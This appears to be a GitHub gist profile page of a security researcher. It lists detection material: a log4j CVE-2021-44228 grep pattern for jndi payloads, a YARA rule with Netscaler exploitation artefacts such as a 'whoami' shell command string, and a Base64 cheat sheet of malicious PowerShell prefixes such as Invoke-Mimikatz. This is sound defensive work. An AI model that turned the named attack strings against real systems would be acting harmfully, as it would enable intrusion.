Skip to content

Instantly share code, notes, and snippets.

View Neo23x0's full-sized avatar

Florian Roth Neo23x0

6.2k followers · 25 following
View GitHub Profile
@Neo23x0
Neo23x0 / cyber-security-blogs.txt
Created September 10, 2022 13:49
Cyber Security Blogs
https://thedfirreport.com/
https://www.zerodayinitiative.com/blog/
https://codewhitesec.blogspot.com/
https://www.digitalshadows.com/blog-and-research/
https://blog.talosintelligence.com/
https://www.riskiq.com/blog/
https://www.sekoia.io/en/blog-sekoia-io/
https://www.nextron-systems.com/blog/
https://www.microsoft.com/security/blog/
https://blog.truesec.com/
@Neo23x0
Neo23x0 / nvidia_cert_leak_vt_dorks.md
Created March 5, 2022 12:49
Samples Signed with NVIDIA Certs
@Neo23x0
Neo23x0 / log4j_rce_detection.md
Last active April 8, 2026 10:46
Log4j RCE CVE-2021-44228 Exploitation Detection

log4j RCE Exploitation Detection

You can use these commands and rules to search for exploitation attempts against log4j RCE vulnerability CVE-2021-44228

Grep / Zgrep

This command searches for exploitation attempts in uncompressed files in folder /var/log and all sub folders

sudo egrep -I -i -r '\$(\{|%7B)jndi:(ldap[s]?|rmi|dns|nis|iiop|corba|nds|http):/[^\n]+' /var/log
@Neo23x0
Neo23x0 / minecraft-seus-shader.md
Last active March 21, 2026 06:21
Minecraft with SEUS Shader - Guide
@Neo23x0
Neo23x0 / help.md
Last active July 30, 2023 12:19
Offensive Research Guide to Help Defense Improve Detection

I've transformed this gist into a git repository.

Whenever you research a certain vulnerability ask yourself these questions and please answer them for us

Logging

Does the exploited service write a log?
(check ls -lrt /var/log or lsof +D /var/log/ or lsof | grep servicename)

@Neo23x0
Neo23x0 / snippet_gen_yara_hash.py
Created October 10, 2020 15:51
YARA Rule Hash Used by Nextron Systems
import hashlib
import re
def calculate_rule_hash(rule):
"""
Calculates a hash over the relevant YARA rule content (string contents, sorted condition)
Requires a YARA rule object as generated by 'plyara': https://github.com/plyara/plyara
:param rule: yara rule object
:return hash: generated hash
"""
@Neo23x0
Neo23x0 / get-casing.py
Created July 2, 2020 14:18
Get All Possible Variations of Casings for a String
import itertools
s = "cmd.exe"
list(map(''.join, itertools.product(*zip(s.upper(), s.lower()))))
@Neo23x0
Neo23x0 / shitrix_artefacts.yar
Last active January 14, 2020 12:34
Netscaler Forensic Artefacts
rule SUSP_Netscaler_Forensic_Artefacts {
meta:
description = "Detects strings / forensic artefacts on exploited Netscaler systems"
author = "Florian Roth"
reference = "https://www.trustedsec.com/blog/netscaler-remote-code-execution-forensics/"
date = "2020-01-14"
score = 70
strings:
$ = "shell_command=\"whoami\"" ascii
@Neo23x0
Neo23x0 / gen_godmode_rule.yml
Last active March 6, 2023 19:07
God Mode Sigma Rule
# ################################################################################
# IMPORTANT NOTE
# The most recent version of this POC rule can now be found in the main repository
# https://github.com/Neo23x0/sigma/blob/master/other/godmode_sigma_rule.yml
# ################################################################################
# _____ __ __ ___ __
# / ___/__ ___/ / / |/ /__ ___/ /__
# / (_ / _ \/ _ / / /|_/ / _ \/ _ / -_)
# \___/\___/\_,_/ /_/ /_/\___/\_,_/\__/_
# / __(_)__ ___ _ ___ _ / _ \__ __/ /__
@Neo23x0
Neo23x0 / Base64_CheatSheet.md
Last active April 13, 2026 08:47
Learning Aid - Top Base64 Encodings Table

Base64 Patterns - Learning Aid

Base64 Code Mnemonic Aid Decoded* Description
JAB πŸ—£ Jabber $. Variable declaration (UTF-16), e.g. JABlAG4AdgA for $env:
TVq πŸ“Ί Television MZ MZ header
SUVY πŸš™ SUV IEX PowerShell Invoke Expression
SQBFAF 🐣 Squab favorite I.E. PowerShell Invoke Expression (UTF-16)
SQBuAH 🐣 Squab uahhh I.n. PowerShell Invoke string (UTF-16) e.g. Invoke-Mimikatz
PAA πŸ’ͺ "Pah!" <. Often used by Emotet (UTF-16)